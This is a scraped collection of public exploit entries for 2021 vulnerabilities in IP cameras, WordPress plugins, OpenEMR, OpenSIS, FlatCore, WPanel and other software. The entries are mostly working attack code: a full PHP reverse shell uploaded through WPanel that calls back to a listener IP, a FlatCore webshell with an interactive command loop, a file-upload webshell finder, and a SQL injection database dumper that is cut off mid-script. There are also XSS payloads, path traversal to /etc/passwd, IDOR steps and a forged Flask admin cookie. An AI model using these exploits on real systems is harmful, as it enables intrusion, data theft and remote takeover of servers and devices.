ISHACK AI BOT

# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40380 There are unauthorized access vulnerabilities, which can lead to the disclosure of device administrator usernames and passwords or rstp usernames and passwords. Payload: /cgi-bin/cameralist/cameralist.cgi /cgi-bin/cameralist/setcamera.cgi?id=* please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

# Exploit Title: Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40381 Has an unauthorized access vulnerability, which can lead to unauthorized access to the camera video page. Payload: /cgi-bin/view/index_MJpeg.cgi please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

# Exploit Title: Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40382 There is an unauthorized access vulnerability, which can lead to unauthorized access to camera video screenshots. Payload: /mjpegStreamer.cgi please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS) # Date: 02/09/2021 # Exploit Author: Nikhil Kapoor # Software Link: https://wordpress.org/plugins/duplicate-page/ # Version: 4.4.1 # Category: Web Application # Tested on Windows How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Duplicate Page 3. Navigate to Settings >> Duplicate Page and enter the XSS payload into the Duplicate Post Suffix input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><svg/onload=confirm(/XSS/)>

# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated) # Date: 07/06/2021 # Exploit Author: Sentinal920 # Vendor Homepage: https://github.com/wpanel # Software Link: https://github.com/wpanel/wpanel4-cms # Version: 4.3.1 # Tested on: Linux import requests import random,string # Change This ################################### url = 'http://192.168.182.134:8080' email = '[email protected]' password = 'admin' ################################### # PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php # Works on linux/windows/mac ########################################################################### # Make sure to change lhost and lport in the reverse shell below (Line 223) ########################################################################### # Get_Cookies r = requests.get(url) r2 = requests.get(url,cookies=r.cookies) cookie = r2.cookies['wpanel_csrf_cookie'] name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9)) payload = ''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="wpanel_csrf_token" '''+cookie+''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="titulo" '''+name+''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="descricao" '''+name+''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="tags" tesad -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php" Content-Type: application/x-php <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $options = array(); // proc_open() options private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; $this->options['bypass_shell'] = true; // we do not want a shell within a shell } else { $detected = false; echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; } return $detected; } private function daemonize() { $exit = false; if (!function_exists('pcntl_fork')) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; } else if (($pid = @pcntl_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; } else if (posix_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; } else { echo "DAEMONIZE: Completed successfully!\n"; } return $exit; } private function settings() { @error_reporting(0); @set_time_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str_replace('<', '<', $data); $data = str_replace('>', '>', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $size = fstat($input)['size']; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC_ERROR: {$errno}: {$errstr}\n"; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); if (!$process) { echo "PROC_ERROR: Cannot start the shell\n"; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n"); do { if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC_ERROR: Shell connection has been terminated\n"; break; } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed\n"; break; } else if ($num_changed_streams > 0) { if ($this->os === 'LINUX') { if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.182.136', 9000); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo '</pre>'; ?> -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="status" 1 -----------------------------45668787242378192391383974033-- ''' data = 'wpanel_csrf_token='+cookie+'&email='+email+'&password='+password headers = {'Content-Type': 'application/x-www-form-urlencoded'} # Login_as_admin r3 = requests.post(url+'/index.php/admin/login',cookies=r.cookies,headers=headers,data=data) def exploit_gallery(): # Adding_Reverse_Shell headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'} r4 = requests.post(url + '/index.php/admin/galleries/add',cookies=r.cookies,headers=headers2,data=payload) print('') print('Shell Uploaded as: '+name) print('') print('Visit: '+url+'/index.php/admin/galleries') print('OR') print('Visit: '+url+'/index.php/galleries') print('') exploit_gallery() #def exploit_post(): #def exloit_pages(): #def dashboard_avatar_image():

# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal # Date: 09-02-2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux # CVE: CVE-2021-40651 The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system. To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file. 1. Login as "Parent" 2. Open a web proxy such as BurpSuite and capture the requests 3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= 4. Check the response PoC: https://youtu.be/wFwlbXANRCo

# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 03.09.2021 # Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe # Vendor Homepage: https://www.remotemouse.net/ # Version: Remote Mouse 3.008 & 4.002 # Tested on: Windows 10 # Proof of Concept: C:\Users\death>sc qc RemoteMouseService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RemoteMouseService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : RemoteMouseService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ RemoteMouseService RemoteMouseService C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe Auto

# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) # Date: 31/08/2021 # Exploit Author: Allen Enosh Upputori # Vendor Homepage: https://www.open-emr.org # Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads # Version: 6.0.0 # Tested on: Linux # CVE : CVE-2021-40352 How to Reproduce this Vulnerability: 1. Install Openemr 6.0.0 2. Login as an Physician 3. Open Messages 4. Click Print 5. Change the existing "noteid=" value to another number This will reveal everybodys messages Incuding Admin only Messages

# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 03.09.2021 # Version: Argus Surveillance DVR 4.0 # Tested on: Windows 10 # Note: "Start as service on Windows Startup" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Argus Surveillance DVR Watchdog DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Argus Surveillance DVR Watchdog ARGUSSURVEILLANCEDVR_WATCHDOG C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe Auto

# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) # Date: 04/10/2021 # Exploit Author: Mason Soroka-Gill @sgizoid # Vendor Homepage: https://flatcore.org/ # Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz # Version: 2.0.7 # Tested on: Ubuntu Server 21.04 # CVE: CVE-2021-39608 # References: # - https://github.com/flatCore/flatCore-CMS/issues/52 #!/usr/bin/env python3 import sys import requests from lxml import html from urllib.parse import urlencode if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'") exit(1) TARGET = sys.argv[1] USERNAME = sys.argv[2] PASSWORD = sys.argv[3] # attempt to log in resp = requests.post(f"{TARGET}/index.php?p=1", data={ "login_name":f"{USERNAME}", "login_psw":f"{PASSWORD}", "login":"Anmelden"}) # grab the PHP session ID PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] # validate credentials worked resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons", headers={"Cookie":PHPSESSID}) if resp.status_code != 200: print("Invalid credentials") exit(1) else: print("Logged in") # grab the csrf token for the script upload csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value # post the shell to the host resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php", data={"upload_type":"plugin", "csrf_token":csrf_token}, # the csrf token files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")}, # the webshell headers={"Cookie":PHPSESSID}) # the php session id # pretend to be a shell while True: command = input("$ ") if command.lower() == "exit" or command.lower() == "q": break resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}") # verify payload succeeded if resp.status_code == 200: print(resp.text) else: print("Error: Something went wrong, maybe the shell didn't work?") break # delete the webshell resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php", headers={"Cookie":PHPSESSID}) if resp.status_code == 200: print("Cleaned up webshell") # clean up the session resp = requests.get(f"{TARGET}/index.php?goto=logout", headers={"Cookie":PHPSESSID}) if resp.status_code == 200: print("Logged out") exit(0)

# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) # Date: 2021-09-05 # Exploit Author: sudoninja # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 - XAMPP Server # Vulnerable page : http://localhost/buspassms/admin/view-pass-detail.php?viewid=4 # Vulnerable paramater : The viewid paramater is Vulnerable to Insecure direct object references (IDOR) # Proof Of Concept : # 1 . Download And install [ bus-pass-management-system ] # 2 . Go to /admin/index.php and Enter Username & Password # 3 . Navigate to search >> search pass # 4 . Click on the view and enter the change viewid into the Url Use : http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]

# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload # Date: 03/09/2021 # Exploit Author: a-rey # Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14928 # Version: v1.0 # Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import time import logging import requests import argparse BANNER = """ ╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ ╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m """ def exploit(url:str, file:str, delay:int) -> None: if not os.path.exists(file): logging.error(f'webshell payload "{file}"" does not exist?') return logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') uploadTime = int(time.time()) r = requests.post(url + '/classes/SystemSettings.php', files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous params={'f' : 'update_settings'}, verify=False ) if not r.ok: logging.error('HTTP upload request failed') return logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...') for i in range(uploadTime - delay, uploadTime + delay + 1): r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') # NOTE: website will send redirects for all files that do not exist if r.status_code != 302: logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') return logging.error('failed to find payload on target') logging.warning('maybe need a larger delay or uploads directory is not writable?') return if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-u', '--url', help='website URL', type=str, required=True) parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.url, args.payload, args.delay)

# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service # Date: 9/5/2021 # Exploit Author: Eric Salario # Vendor Homepage: https://www.smartftp.com/en-us/ # Software Link: https://www.smartftp.com/en-us/download # Version: 10.0.2909.0 (32 and 64 bit) # Tested on: Microsoft Windows 10 32 bit and 64 bit ========================================================================= buffer = "//" buffer += "A" * 423 f = open ("path.txt", "w") f.write(buffer) f.close() 1. Run the python script 2. Open SmartFTP > New Connection > FTPS (explicit) 3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) 4. In Path, copy paste the content of the "path.txt" generated by the python script 5. Click "OK" 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP > New Connection > FTPS (explicit) 2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) 3. In Path, type slash ("/") and click "OK" 4. The app should return "Error 0x80072741" 5. In the path's search bar, replace slash ("/") with whatever and press enter 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP 2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) 3. Once the history is empty, click the bar and type anything 3. SmartFTP client crashes

# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS # Date: 03/09/2021 # Exploit Author: a-rey # Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14928 # Version: v1.0 # Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import logging import requests import argparse BANNER = """ ╔═══════════════════════════════════════════════════════════════════╗ ║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║ ╚═══════════════════════════════════════════════════════════════════╝ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m """ def exploit(url:str, file:str) -> None: if not os.path.exists(file): logging.error(f'{file} does not exist?') return logging.info(f'reading {file} for XSS content ...') with open(file, 'r') as f: xssPayload = f.read() logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...') r = requests.post(url + '/classes/SystemSettings.php', data={'about_us' : xssPayload}, params={'f' : 'update_settings'}, verify=False ) if not r.ok: logging.error('HTTP request failed') return logging.info('checking for XSS payload on main page ...') r = requests.get(url) if xssPayload not in r.text: logging.error(f'XSS injection failed? received: {r.text}') logging.warning('maybe about.html is not writable?') return logging.success('XSS payload found on target website') return if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-u', '--url', help='website URL', type=str, required=True) parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True) parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.url, args.file)

# Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass # Date: 09/06/2021 # Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 # Exploit Author: CQR.company / Vulnz. # Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor # Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/ # Version: 0.5.0 # Tested on: Windows, Linux, Macos Software is commonly used for Monitoring antminers and could easily be found in zoomeye ( 800), shodan ( 500). For now this is the most popular antminer monitoring tool. Vulnerability in Antminer Monitor exists because of backdoor or misconfiguration done by developer inside settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static in this build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub <https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py> Secret key is 'super secret key'. Based on this information we can craft authorization bypass cookies. Using software flask-unsing we can generate cookie which will provide you admin access. flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" Additionally you can use this universal cookie to access web interface of flask application. This cookie can work on all systems in "session" field. .eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU In addition DEBUG = True which means /console works, however it needs pin.

# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS) # Date: 07/09/2021 # Exploit Author: Nikhil Kapoor # Software Link: https://wordpress.org/plugins/wp-sitemap-page/ # Version: 1.6.4 # Category: Web Application # Tested on Windows How to Reproduce this Vulnerability: 1. Install WordPress 5.8.0 2. Install and activate WP Sitemap Page 3. Navigate to Settings >> WP Sitemap Page >> Settings and enter the XSS payload into the "How to display the posts" Input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: </textarea><svg/onload=confirm('XSS')>

# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2) # Date: 2021-09-07 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: MariaDB,MYSQL #!/usr/bin/python3 import requests import re import warnings from bs4 import BeautifulSoup, CData import sys import argparse import os import time from termcolor import colored import validators #Install all the requirements """ pip3 install requests pip3 install bs4 pip3 install argparse pip3 install termcolor pip3 install validators """ parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)') parser.add_argument('-u',help='Poll & Survey page URL') args = parser.parse_args() url = args.u if len(sys.argv) !=3: parser.print_help(sys.stderr) sys.exit() if not validators.url(url): print(colored("\r\nEnter URL with http:// or https://\r\n",'red')) parser.print_help(sys.stderr) sys.exit() def currect_db_name(): payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]""" inject(payload) def db_version(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]""" inject(payload) def hostname(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]""" inject(payload) def current_user(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]""" inject(payload) def list_databases(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]""" inject(payload) def list_tables_db(): db = input("\r\nDatabase : ") payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db) inject(payload) def list_columns_db(): db = input("\r\nDatabase : ") table = input("Table : ") payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table) inject(payload) def dump_db(): db = input("\r\nDatabase: ") table = input("Table: ") column = input("Columns Eg: users,password : ") dump = "%s.%s" %(db,table) payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table) inject(payload) def custom_payload(): payload = input("\r\nPayload : ") inject(payload) def inject(inject_payload): request = requests.Session() cookies = { 